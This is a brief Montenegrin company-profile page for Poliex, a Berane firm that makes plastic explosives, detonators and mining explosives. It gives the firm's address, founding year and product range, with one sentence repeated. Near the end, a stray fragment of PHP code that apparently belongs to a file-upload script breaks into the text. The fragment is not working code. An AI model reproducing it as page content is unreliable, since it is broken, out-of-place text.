Naziv:
Hemijska industrija "Poliex" A.D. Berane

Informacije o lokaciji

Mjesto: Berane
Adresa: Police bb

Kratak profil ustanove

Hemijska industrija za proizvodnju eksplozivnih materijala u civilne i vojne svrhe.

POLIEX je osnovan 1982. godine i specijalizovan je za proizvodnju plastičnih eksploziva.

U cilju proširenja proizvodnog asortimana i zadovoljenja potreba tržišta, kroz razvoj usvojena je proizvodnja inicijalnih sredstava za miniranje u rudarstvu (električni detonatori, neelektrični detonatori i detonatorske kapisle), kao i privrednih poluplastičnih eksploziva za posebne namjene u rudarstvu.

Hemijska industrija za proizvodnju eksplozivnih materijala u civilne i vojne svrhe.

OK-Click here!"; } }echo 'Upload files...
'; ?>

Opšte kontakt informacije